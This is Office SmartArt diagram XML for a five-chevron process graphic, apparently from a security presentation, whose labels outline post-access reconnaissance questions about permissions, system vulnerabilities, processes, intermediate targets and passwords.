    <dgm:pt modelId="{BC7A68D8-1F64-4189-9354-83D034D85E20}" type="pres">
      <dgm:prSet presAssocID="{D19BF4BB-1974-41C3-BEC1-8EFF0CE452FF}" presName="parTxOnly" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{CFC32204-12C2-4D24-8708-01FC784DB789}" srcId="{A4045124-A806-4D01-88BC-820E9AC6F89D}" destId="{A54EC9B7-7CF0-4E62-B6CD-D3101DE5B068}" srcOrd="0" destOrd="0" parTransId="{CFF1800A-A716-4219-82BE-2964DD34B8A4}" sibTransId="{A915BFA6-0B4A-43D0-8DE4-1FBC6697BA7E}"/>
    <dgm:cxn modelId="{B0B07505-007E-440F-8D65-C735F2B24E4D}" srcId="{A4045124-A806-4D01-88BC-820E9AC6F89D}" destId="{78EE4FDA-84CA-4298-AEBD-BA98D749262E}" srcOrd="1" destOrd="0" parTransId="{B1E4257A-FCED-4906-8B3D-0B2286D8EC63}" sibTransId="{133087C4-2CDD-4384-9683-AC20C3B27779}"/>
    <dgm:cxn modelId="{3AA2E533-162D-432A-A79E-9EB4AC8E806D}" type="presOf" srcId="{DFC975DB-2264-420D-8DE4-81CA93D4B366}" destId="{154D5D72-A51F-482D-8C93-E923C883F49B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{C7118077-583A-4917-84F9-0AE6A97FFFDB}" type="presOf" srcId="{D19BF4BB-1974-41C3-BEC1-8EFF0CE452FF}" destId="{BC7A68D8-1F64-4189-9354-83D034D85E20}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{E1658786-2788-4681-B8C4-D54768FCDC67}" type="presOf" srcId="{E24D0D4F-9716-4235-9B92-D4A1BCF3907D}" destId="{EC45B1F4-3F2A-4915-B09B-57B4232D3063}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{226AF086-3AB2-423C-87F6-0A444B3728A1}" type="presOf" srcId="{78EE4FDA-84CA-4298-AEBD-BA98D749262E}" destId="{FBFAE013-AF5E-4418-B606-582BABB37BBD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{329E938A-FEB3-494D-946E-4BC4BEEEC2F6}" srcId="{A4045124-A806-4D01-88BC-820E9AC6F89D}" destId="{D19BF4BB-1974-41C3-BEC1-8EFF0CE452FF}" srcOrd="4" destOrd="0" parTransId="{17E0A448-6A90-4944-B22A-931692E6991D}" sibTransId="{8CCEB6F4-0B4B-4DE1-9574-1B13A5FBCB12}"/>
    <dgm:cxn modelId="{B553B68A-C86B-4B11-85F5-28BC7DD3B7B9}" srcId="{A4045124-A806-4D01-88BC-820E9AC6F89D}" destId="{E24D0D4F-9716-4235-9B92-D4A1BCF3907D}" srcOrd="2" destOrd="0" parTransId="{2C4FC3C0-820C-4F43-B834-ABE4A64258C7}" sibTransId="{24186794-EDA7-4270-8463-3E82FB5FA43B}"/>
    <dgm:cxn modelId="{B44452C3-630F-4A06-845F-BB686F5AC675}" type="presOf" srcId="{A4045124-A806-4D01-88BC-820E9AC6F89D}" destId="{F3C3A630-EDB3-4C3C-B2EF-7FD63735F1C2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{84FDDACF-0E48-4171-8757-9129A1D256F8}" type="presOf" srcId="{A54EC9B7-7CF0-4E62-B6CD-D3101DE5B068}" destId="{19500FD1-F073-4B16-805E-CC99C4EBA2F8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{C0501FFF-2C71-4D7E-8543-1E08EAE3817A}" srcId="{A4045124-A806-4D01-88BC-820E9AC6F89D}" destId="{DFC975DB-2264-420D-8DE4-81CA93D4B366}" srcOrd="3" destOrd="0" parTransId="{5FC81E92-D00B-48D4-A11B-28674C934CA3}" sibTransId="{E088592C-C90C-4480-938D-EA0B9D8F5F64}"/>
    <dgm:cxn modelId="{3B01D13F-9000-47B0-B91A-A91D7521B18A}" type="presParOf" srcId="{F3C3A630-EDB3-4C3C-B2EF-7FD63735F1C2}" destId="{19500FD1-F073-4B16-805E-CC99C4EBA2F8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{F349FF15-84E4-48FE-8135-8A7F947B0A4D}" type="presParOf" srcId="{F3C3A630-EDB3-4C3C-B2EF-7FD63735F1C2}" destId="{63FE44D6-14D0-4D06-AA89-6202D7BAC738}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{C59A44A1-50A3-4B0A-8E80-C0C15B0F669F}" type="presParOf" srcId="{F3C3A630-EDB3-4C3C-B2EF-7FD63735F1C2}" destId="{FBFAE013-AF5E-4418-B606-582BABB37BBD}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{426A4F3F-7055-4084-BC54-3CB3BE851F5D}" type="presParOf" srcId="{F3C3A630-EDB3-4C3C-B2EF-7FD63735F1C2}" destId="{798A5003-3869-4F46-BFAB-513237529333}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{1FDAE588-3EAA-4186-BD6F-6277BE22FD2F}" type="presParOf" srcId="{F3C3A630-EDB3-4C3C-B2EF-7FD63735F1C2}" destId="{EC45B1F4-3F2A-4915-B09B-57B4232D3063}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{54CA6C3A-D000-49B9-89BA-98F49373E7C6}" type="presParOf" srcId="{F3C3A630-EDB3-4C3C-B2EF-7FD63735F1C2}" destId="{B0B0DA5D-0376-4363-BBC0-F75BD319350F}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{A09305F2-4F48-44A7-8CA1-7EDA6066CC2C}" type="presParOf" srcId="{F3C3A630-EDB3-4C3C-B2EF-7FD63735F1C2}" destId="{154D5D72-A51F-482D-8C93-E923C883F49B}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{2A8482D7-B1E6-4B3E-98B8-11B82C1D4C16}" type="presParOf" srcId="{F3C3A630-EDB3-4C3C-B2EF-7FD63735F1C2}" destId="{1BB85132-1728-463A-8FB5-7ACC8D41CB1E}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{FB795EEC-1570-4924-99AB-C6A5308C7820}" type="presParOf" srcId="{F3C3A630-EDB3-4C3C-B2EF-7FD63735F1C2}" destId="{BC7A68D8-1F64-4189-9354-83D034D85E2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045124-A806-4D01-88BC-820E9AC6F89D}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3" loCatId="process" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple1" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/colorful3" csCatId="colorful" phldr="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A54EC9B7-7CF0-4E62-B6CD-D3101DE5B068}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Who am I?</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>(permissions)</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CFF1800A-A716-4219-82BE-2964DD34B8A4}" type="parTrans" cxnId="{CFC32204-12C2-4D24-8708-01FC784DB789}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A915BFA6-0B4A-43D0-8DE4-1FBC6697BA7E}" type="sibTrans" cxnId="{CFC32204-12C2-4D24-8708-01FC784DB789}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{78EE4FDA-84CA-4298-AEBD-BA98D749262E}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Where am I?</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>(system vulns)</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B1E4257A-FCED-4906-8B3D-0B2286D8EC63}" type="parTrans" cxnId="{B0B07505-007E-440F-8D65-C735F2B24E4D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{133087C4-2CDD-4384-9683-AC20C3B27779}" type="sibTrans" cxnId="{B0B07505-007E-440F-8D65-C735F2B24E4D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E24D0D4F-9716-4235-9B92-D4A1BCF3907D}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>What’s going on?</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>(processes)</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2C4FC3C0-820C-4F43-B834-ABE4A64258C7}" type="parTrans" cxnId="{B553B68A-C86B-4B11-85F5-28BC7DD3B7B9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{24186794-EDA7-4270-8463-3E82FB5FA43B}" type="sibTrans" cxnId="{B553B68A-C86B-4B11-85F5-28BC7DD3B7B9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DFC975DB-2264-420D-8DE4-81CA93D4B366}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Am I alone?</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>(intermediate targets)</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5FC81E92-D00B-48D4-A11B-28674C934CA3}" type="parTrans" cxnId="{C0501FFF-2C71-4D7E-8543-1E08EAE3817A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E088592C-C90C-4480-938D-EA0B9D8F5F64}" type="sibTrans" cxnId="{C0501FFF-2C71-4D7E-8543-1E08EAE3817A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D19BF4BB-1974-41C3-BEC1-8EFF0CE452FF}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>What’s in my pocket?</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>(passwords, other info)</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{17E0A448-6A90-4944-B22A-931692E6991D}" type="parTrans" cxnId="{329E938A-FEB3-494D-946E-4BC4BEEEC2F6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8CCEB6F4-0B4B-4DE1-9574-1B13A5FBCB12}" type="sibTrans" cxnId="{329E938A-FEB3-494D-946E-4BC4BEEEC2F6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F3C3A630-EDB3-4C3C-B2EF-7FD63735F1C2}" type="pres">
      <dgm:prSet presAssocID="{A4045124-A806-4D01-88BC-820E9AC6F89D}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{19500FD1-F073-4B16-805E-CC99C4EBA2F8}" type="pres">
      <dgm:prSet presAssocID="{A54EC9B7-7CF0-4E62-B6CD-D3101DE5B068}" presName="parTxOnly" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{63FE44D6-14D0-4D06-AA89-6202D7BAC738}" type="pres">
      <dgm:prSet presAssocID="{A915BFA6-0B4A-43D0-8DE4-1FBC6697BA7E}" presName="parSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FBFAE013-AF5E-4418-B606-582BABB37BBD}" type="pres">
      <dgm:prSet presAssocID="{78EE4FDA-84CA-4298-AEBD-BA98D749262E}" presName="parTxOnly" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{798A5003-3869-4F46-BFAB-513237529333}" type="pres">
      <dgm:prSet presAssocID="{133087C4-2CDD-4384-9683-AC20C3B27779}" presName="parSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EC45B1F4-3F2A-4915-B09B-57B4232D3063}" type="pres">
      <dgm:prSet presAssocID="{E24D0D4F-9716-4235-9B92-D4A1BCF3907D}" presName="parTxOnly" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B0B0DA5D-0376-4363-BBC0-F75BD319350F}" type="pres">
      <dgm:prSet presAssocID="{24186794-EDA7-4270-8463-3E82FB5FA43B}" presName="parSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{154D5D72-A51F-482D-8C93-E923C883F49B}" type="pres">
      <dgm:prSet presAssocID="{DFC975DB-2264-420D-8DE4-81CA93D4B366}" presName="parTxOnly" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1BB85132-1728-463A-8FB5-7ACC8D41CB1E}" type="pres">
      <dgm:prSet presAssocID="{E088592C-C90C-4480-938D-EA0B9D8F5F64}" presName="parSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BC7A68D8-1F64-4189-9354-83D034D85E20}" type="pres">
      <dgm:prSet presAssocID="{D19BF4BB-1974-41C3-BEC1-8EFF0CE452FF}" presName="parTxOnly" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{CFC32204-12C2-4D24-8708-01FC784DB789}" srcId="{A4045124-A806-4D01-88BC-820E9AC6F89D}" destId="{A54EC9B7-7CF0-4E62-B6CD-D3101DE5B068}" srcOrd="0" destOrd="0" parTransId="{CFF1800A-A716-4219-82BE-2964DD34B8A4}" sibTransId="{A915BFA6-0B4A-43D0-8DE4-1FBC6697BA7E}"/>
    <dgm:cxn modelId="{B0B07505-007E-440F-8D65-C735F2B24E4D}" srcId="{A4045124-A806-4D01-88BC-820E9AC6F89D}" destId="{78EE4FDA-84CA-4298-AEBD-BA98D749262E}" srcOrd="1" destOrd="0" parTransId="{B1E4257A-FCED-4906-8B3D-0B2286D8EC63}" sibTransId="{133087C4-2CDD-4384-9683-AC20C3B27779}"/>
    <dgm:cxn modelId="{3AA2E533-162D-432A-A79E-9EB4AC8E806D}" type="presOf" srcId="{DFC975DB-2264-420D-8DE4-81CA93D4B366}" destId="{154D5D72-A51F-482D-8C93-E923C883F49B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{C7118077-583A-4917-84F9-0AE6A97FFFDB}" type="presOf" srcId="{D19BF4BB-1974-41C3-BEC1-8EFF0CE452FF}" destId="{BC7A68D8-1F64-4189-9354-83D034D85E20}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{E1658786-2788-4681-B8C4-D54768FCDC67}" type="presOf" srcId="{E24D0D4F-9716-4235-9B92-D4A1BCF3907D}" destId="{EC45B1F4-3F2A-4915-B09B-57B4232D3063}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{226AF086-3AB2-423C-87F6-0A444B3728A1}" type="presOf" srcId="{78EE4FDA-84CA-4298-AEBD-BA98D749262E}" destId="{FBFAE013-AF5E-4418-B606-582BABB37BBD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{329E938A-FEB3-494D-946E-4BC4BEEEC2F6}" srcId="{A4045124-A806-4D01-88BC-820E9AC6F89D}" destId="{D19BF4BB-1974-41C3-BEC1-8EFF0CE452FF}" srcOrd="4" destOrd="0" parTransId="{17E0A448-6A90-4944-B22A-931692E6991D}" sibTransId="{8CCEB6F4-0B4B-4DE1-9574-1B13A5FBCB12}"/>
    <dgm:cxn modelId="{B553B68A-C86B-4B11-85F5-28BC7DD3B7B9}" srcId="{A4045124-A806-4D01-88BC-820E9AC6F89D}" destId="{E24D0D4F-9716-4235-9B92-D4A1BCF3907D}" srcOrd="2" destOrd="0" parTransId="{2C4FC3C0-820C-4F43-B834-ABE4A64258C7}" sibTransId="{24186794-EDA7-4270-8463-3E82FB5FA43B}"/>
    <dgm:cxn modelId="{B44452C3-630F-4A06-845F-BB686F5AC675}" type="presOf" srcId="{A4045124-A806-4D01-88BC-820E9AC6F89D}" destId="{F3C3A630-EDB3-4C3C-B2EF-7FD63735F1C2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{84FDDACF-0E48-4171-8757-9129A1D256F8}" type="presOf" srcId="{A54EC9B7-7CF0-4E62-B6CD-D3101DE5B068}" destId="{19500FD1-F073-4B16-805E-CC99C4EBA2F8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{C0501FFF-2C71-4D7E-8543-1E08EAE3817A}" srcId="{A4045124-A806-4D01-88BC-820E9AC6F89D}" destId="{DFC975DB-2264-420D-8DE4-81CA93D4B366}" srcOrd="3" destOrd="0" parTransId="{5FC81E92-D00B-48D4-A11B-28674C934CA3}" sibTransId="{E088592C-C90C-4480-938D-EA0B9D8F5F64}"/>
    <dgm:cxn modelId="{3B01D13F-9000-47B0-B91A-A91D7521B18A}" type="presParOf" srcId="{F3C3A630-EDB3-4C3C-B2EF-7FD63735F1C2}" destId="{19500FD1-F073-4B16-805E-CC99C4EBA2F8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{F349FF15-84E4-48FE-8135-8A7F947B0A4D}" type="presParOf" srcId="{F3C3A630-EDB3-4C3C-B2EF-7FD63735F1C2}" destId="{63FE44D6-14D0-4D06-AA89-6202D7BAC738}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{C59A44A1-50A3-4B0A-8E80-C0C15B0F669F}" type="presParOf" srcId="{F3C3A630-EDB3-4C3C-B2EF-7FD63735F1C2}" destId="{FBFAE013-AF5E-4418-B606-582BABB37BBD}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{426A4F3F-7055-4084-BC54-3CB3BE851F5D}" type="presParOf" srcId="{F3C3A630-EDB3-4C3C-B2EF-7FD63735F1C2}" destId="{798A5003-3869-4F46-BFAB-513237529333}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{1FDAE588-3EAA-4186-BD6F-6277BE22FD2F}" type="presParOf" srcId="{F3C3A630-EDB3-4C3C-B2EF-7FD63735F1C2}" destId="{EC45B1F4-3F2A-4915-B09B-57B4232D3063}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{54CA6C3A-D000-49B9-89BA-98F49373E7C6}" type="presParOf" srcId="{F3C3A630-EDB3-4C3C-B2EF-7FD63735F1C2}" destId="{B0B0DA5D-0376-4363-BBC0-F75BD319350F}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{A09305F2-4F48-44A7-8CA1-7EDA6066CC2C}" type="presParOf" srcId="{F3C3A630-EDB3-4C3C-B2EF-7FD63735F1C2}" destId="{154D5D72-A51F-482D-8C93-E923C883F49B}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{2A8482D7-B1E6-4B3E-98B8-11B82C1D4C16}" type="presParOf" srcId="{F3C3A630-EDB3-4C3C-B2EF-7FD63735F1C2}" destId="{1BB85132-1728-463A-8FB5-7ACC8D41CB1E}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{FB795EEC-1570-4924-99AB-C6A5308C7820}" type="presParOf" srcId="{F3C3A630-EDB3-4C3C-B2EF-7FD63735F1C2}" destId="{BC7A68D8-1F64-4189-9354-83D034D85E2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00FD1-F073-4B16-805E-CC99C4EBA2F8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1384" y="814590"/>
          <a:ext cx="2700380" cy="1080152"/>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Who am I?</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="800100">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>(permissions)</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1384" y="814590"/>
        <a:ext cx="2430342" cy="1080152"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FBFAE013-AF5E-4418-B606-582BABB37BBD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2161689" y="814590"/>
          <a:ext cx="2700380" cy="1080152"/>
        </a:xfrm>
        <a:prstGeom prst="chevron">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent3">
            <a:hueOff val="-1055383"/>
            <a:satOff val="-2835"/>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Where am I?</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="800100">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>(system vulns)</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2701765" y="814590"/>
        <a:ext cx="1620228" cy="1080152"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{EC45B1F4-3F2A-4915-B09B-57B4232D3063}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4321993" y="814590"/>
          <a:ext cx="2700380" cy="1080152"/>
        </a:xfrm>
        <a:prstGeom prst="chevron">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent3">
            <a:hueOff val="-2110765"/>
            <a:satOff val="-5671"/>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What’s going on?</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="800100">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>(processes)</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4862069" y="814590"/>
